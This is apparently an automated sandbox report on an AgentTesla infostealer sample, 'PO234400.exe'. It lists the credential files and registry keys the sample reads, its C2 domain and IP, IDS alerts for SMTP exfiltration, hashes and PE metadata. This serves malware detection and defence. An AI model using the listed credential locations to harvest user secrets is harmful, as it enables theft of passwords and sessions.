                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Users\user\Desktop\PO234400.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\PO234400.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\PO234400.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO234400.exe PID: 7516, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 0.2.PO234400.exe.418b348.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO234400.exe.4162328.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.PO234400.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO234400.exe.418b348.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO234400.exe.4162328.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.2606062779.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO234400.exe PID: 7516, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		111
                        Process Injection                        		1
                        Masquerading                        		1
                        OS Credential Dumping                        		111
                        Security Software Discovery                        		Remote Services1
                        Email Collection                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		1
                        Credentials in Registry                        		1
                        Process Discovery                        		Remote Desktop Protocol11
                        Archive Collected Data                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                        Virtualization/Sandbox Evasion                        		Security Account Manager141
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin Shares1
                        Data from Local System                        		1
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput Capture11
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets1
                        File and Directory Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                        Obfuscated Files or Information                        		Cached Domain Credentials24
                        System Information Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Software Packing                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Timestomp                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        DLL Side-Loading                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        PO234400.exe61%ReversingLabsWin32.Spyware.Negasteal
                        PO234400.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://mbarieservicesltd.com0%Avira URL Cloudsafe
                        http://mail.mbarieservicesltd.com100%Avira URL Cloudmalware
                        http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mbarieservicesltd.com
                        		199.79.62.115
                        		truetrue
                          		unknown
                          mail.mbarieservicesltd.com
                          		unknown
                          		unknowntrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://mbarieservicesltd.comPO234400.exe, 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO234400.exe, 00000000.00000002.1378595010.0000000002F57000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://tempuri.org/DataSet1.xsdPO234400.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://mail.mbarieservicesltd.comPO234400.exe, 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              199.79.62.115
                              		mbarieservicesltd.comUnited States
                              		394695PUBLIC-DOMAIN-REGISTRYUStrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1410984
                              Start date and time:2024-03-18 14:29:33 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 40s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:PO234400.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@9/6@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 46
                              • Number of non-executed functions: 7
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: PO234400.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              14:30:23API Interceptor22x Sleep call for process: PO234400.exe modified
                              14:30:25API Interceptor12x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              199.79.62.115260224-027.exeGet hashmaliciousAgentTeslaBrowse
                                xWDXthOyvb.exeGet hashmaliciousAgentTeslaBrowse
                                  mo49c5w1Dg.exeGet hashmaliciousAgentTeslaBrowse
                                    SA3190 - SO3216.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      PO-8700.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        60025450.exeGet hashmaliciousAgentTeslaBrowse
                                          quote_200006595.exeGet hashmaliciousAgentTeslaBrowse
                                            Quotation_Details.exeGet hashmaliciousAgentTeslaBrowse
                                              SWIFT004.exeGet hashmaliciousAgentTeslaBrowse
                                                SecuriteInfo.com.Win32.TrojanX-gen.8086.15681.exeGet hashmaliciousAgentTeslaBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  mbarieservicesltd.comQuote_3309.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 35.186.223.180

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  PUBLIC-DOMAIN-REGISTRYUSWZEF7aEu11.exeGet hashmaliciousUnknownBrowse
                                                  • 74.119.239.234
                                                  WZEF7aEu11.exeGet hashmaliciousUnknownBrowse
                                                  • 74.119.239.234
                                                  WZEF7aEu11.exeGet hashmaliciousUnknownBrowse
                                                  • 74.119.239.234
                                                  260224-027.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  WZEF7aEu11.exeGet hashmaliciousUnknownBrowse
                                                  • 74.119.239.234
                                                  https://sprl.in/wBwUGK0Get hashmaliciousUnknownBrowse
                                                  • 216.10.243.64
                                                  Proforma Invoice001&002-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.223
                                                  PO m#U1edbi_#28809466.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.223
                                                  PO.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.198.143
                                                  DHL Receipt_ AWB#62600719881.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.224

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO234400.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\PO234400.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2232
                                                  Entropy (8bit):5.380046556058007
                                                  Encrypted:false
                                                  SSDEEP:48:tWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZSUyus:tLHxv2IfLZ2KRH6OugEs
                                                  MD5:6CC7DDDD06B381EA5284A27AE5E5B633
                                                  SHA1:D41CE03873A1DCE6220D830CD8212B93B4265DBF
                                                  SHA-256:A5A75507E7FEC921191D067D0092446489C317DDC070A8C4B78EB26563DA8927
                                                  SHA-512:91A4496B77D67240A41548997C2858DCB14ED29579586738157568220A902F1E7FB47FC09FE1DC27B1B0315DDBE6E039D6C67217AE472E05621E97ADC46F1A18
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5m1c2nii.nam.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a05r2hnr.pls.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fp35rzaj.cbr.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdyvhbvf.dsv.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.848927129971296
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:PO234400.exe
                                                  File size:634'368 bytes
                                                  MD5:1ed78424905206c4549ac51b97b5120b
                                                  SHA1:bd106b43a6cad1fc21d8b71cb70c86295a9439b7
                                                  SHA256:5ca87353c4d37e66f76875a46235208796dd620ad3cb7cebc6b5e66be55b2913
                                                  SHA512:dbe0ed36c6813e0037d578e6a79562949386e135c755b9da95e23686e71a4c5f22f5fa096d851b67393d0a9351c72c4124b0be2d5d610704f483021acd772380
                                                  SSDEEP:12288:S2ShC3RLZiWsXk3qNIvomdlP27H/MNThSlOeFsd/hE:VSUJZdbdCH/shSlOVZE
                                                  TLSH:D3D4010327E8AA1EF47FA7F424611114137A7A17BA73D74D4FE8E1CB1A21B054E62B1B
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............f.... ........@.. ....................... ............@................................

                                                  File Icon

                                                  Icon Hash:00928e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x49c066
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0xF37F2E8A [Mon Jun 15 09:21:14 2099 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9c0130x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x620.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x995200x70.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x9a06c0x9a200ef51eb50e1294e89336ddd8b5fdbfb66False0.8867330063868614data7.8603183590444825IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x9e0000x6200x800b2700473df96ed14ece9bab955f11d37False0.33984375data3.471390538284318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xa00000xc0x20089a5598d525f1c5ff2371fc8771ef23dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0x9e0900x390data0.4276315789473684
                                                  RT_MANIFEST0x9e4300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  03/18/24-14:30:28.601602TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249708587192.168.2.8199.79.62.115
                                                  03/18/24-14:30:28.601602TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49708587192.168.2.8199.79.62.115
                                                  03/18/24-14:30:28.601602TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49708587192.168.2.8199.79.62.115
                                                  03/18/24-14:30:28.601602TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49708587192.168.2.8199.79.62.115
                                                  03/18/24-14:30:28.601602TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49708587192.168.2.8199.79.62.115
                                                  03/18/24-14:30:28.601602TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49708587192.168.2.8199.79.62.115

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Mar 18, 2024 14:30:26.939718962 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:27.112437963 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:27.112546921 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:27.378134012 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:27.378813982 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:27.551665068 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:27.552731037 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:27.725832939 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:27.726944923 CET49708587192.168.2.8199.79.62.115
                                                  Mar 18, 2024 14:30:27.940346003 CET58749708199.79.62.115192.168.2.8
                                                  Mar 18, 2024 14:30:28.067830086 CET58749708199.79.62.115192.168.2.8
